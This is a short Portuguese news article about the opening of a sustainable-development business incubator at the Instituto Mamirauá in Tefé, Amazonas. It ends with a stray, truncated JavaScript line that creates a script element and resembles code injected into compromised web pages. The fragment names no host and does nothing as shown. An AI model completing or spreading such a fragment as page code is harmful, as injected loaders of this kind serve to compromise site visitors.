Uma incubadora voltada para promover o desenvolvimento sustentável na região do município de Tefé (a 523 quilômetros de Manaus) foi inaugurada, no mês de abril, na sede Instituto de Desenvolvimento Sustentável Mamirauá, no interior do Amazonas. A Incubadora Mamirauá faz parte d­o plano de incentivo à inovação no Estado promovido pelo Projeto Aliança, que une ações do Instituto Nacional de Pesquisas da Amazônia (INPA/MCTI), Instituto Mamirauá, Fundação Amazonas Sustentável (FAS) e Centro de Incubação e Desenvolvimento Empresarial (CIDE).

De acordo com a representante do INPA no evento e coordenadora geral do Projeto Aliança, Rosângela Bentes, a inauguração em Tefé faz parte da estratégia de interiorização das ações de inovação no Amazonas.

Para o diretor do CIDE as boas ideias devem ser apoiadas. “O empreendedorismo pode acontecer em qualquer lugar. Portanto, as incubadoras devem orientar as ideias inovadoras e sustentáveis e fomentar o trabalho das pessoas no interior do Amazonas”, disse José Barbosa Grosso.



Foto: Representantes do CIDE, INPA e do Instituto Mamirauá, nas instalações da nova incubadora, no município de Tefé.  

 

var d=document;var s=d.createElement(‘script’);